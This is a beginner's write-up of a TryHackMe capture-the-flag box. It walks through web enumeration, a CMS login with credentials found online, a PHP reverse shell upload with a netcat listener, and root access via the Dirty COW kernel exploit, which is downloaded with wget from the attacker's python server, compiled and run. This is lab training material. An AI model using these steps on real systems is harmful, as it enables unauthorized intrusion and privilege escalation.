Delex(Tryhackme) — Write Up
This is my first write up , please read it and please comment the improvement related queries in command box.
Delex is an private Try hack me machine Created by Ehackify Cybersecurity Research center. This is an beginner level web application box focused in Basic Reconnaissance ,Cms and Kernel faces.
Table of contents
Scanning
Nmap
Enumeration
Gobuster
Exploitation
Php Reverse Shell and Net Cat
Privilege Escalation
Dirty Cow (Kernal Exploit)
Scanning
( In this face I want to do the OS Discovery, Open ports, Services on open ports and also the vulnerability scripts checking too.)
For scanning purpose I choose Nmap. Nmap is default in all Debian OS and also download available for Windows, Mac OS.
In my port scanning I get an Port 80 was open and I moved on that and just run it on browser.
And that time in other terminal screen I run gobuster tool for directory discovery.
sudo gobuster dir -u <IP> -w /usr/share/wordlists/dirb/common.txt
and I found an interesting stuff robots.txt and get and /textpattern/textpattern directory from there. And move on it.
Ho…Damn it..! Here have some security stuffs…Where did I get it..? Haam..Have any stuff in index page..? let’s check it…!
Yeah…I got an interesting user name stuff from here…But where is the password. Ho yah let’s try some common stuffs.. Ho no, it’s not working..! Any thing more in this page.. Yes…! I got an external stuff related this user it’s an linked in profile link.
Observe carefully it, got some post stuff related to this machine. Here have an highlighted stuff “lionheart”.
Then move to /textpattern/textpattern page and enter the credential stuffs in there..!
User Name: mayer
Password: lionheart
wooow…! Jubilant…! I got an access to the it.!
wait..! wait..! Here have some weakness stuff… Haam..! We have an opportunity to upload a php page and try to upload a reverseshell.php file.
I got the reverse php file from here “https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php” and saved it on system named as reverse.php and edit it with our own listener stuffs like tun0 IP address and port numbers too. Finally upload it to textpattern.
We successfully uploaded it. Then we want a reverse connection with it. For that at a time we run this uploaded stuff in our web browse and an Netcat listener in our terminal too.
Yeah ..! We got it the reverse connection…?
It’s just an reverse connection we want more than that..! First of all we want an interactive shell connection with the target machine. For that we run an python script:
python -c ‘import pty; pty.spawn(“/bin/sh”)’
Then move to user flag..! yeah got it..!
Ho no..! It’s just only a user thinks we want more privilage to get root flag…
For that we wan to check the kernal version for that enter “uname -r” and it’s “3.2.0–4-amd64” and move to exploit-db to find vulnerability on this version and got an dirty cow vulnerability using pokemon exploit. Save it in my system.
Next stuff is most important..! We want to upload this file into our target machine for that purpose we up an python server from the directory which is stored this stuff.
python -m http.server <PORT>
Next move is, download it from target machine for this process we use the wget command.
wget -m http://<tun0_IP>:<Por>/<File_name>
It’s an C file and we want to run it on our target system for this we use this command.
gcc -pthread 40839.c -o dirty -lcrypt
It will compile this c file to an shell and then we give the privilage to this file using chmod.
chmod +x dirty
After execute this file using this file.
./dirty
This exploit will create an new user named as firefart, we want to set an custom password for it from passwd.bak in /tmp/passwd.bak.
Then exit from the current shell, regain the access and then access the new user firefart , enter the customized password too.
su firefart
Got some root stuffs..!
It’s pwned..!
Finally Take the root flag.
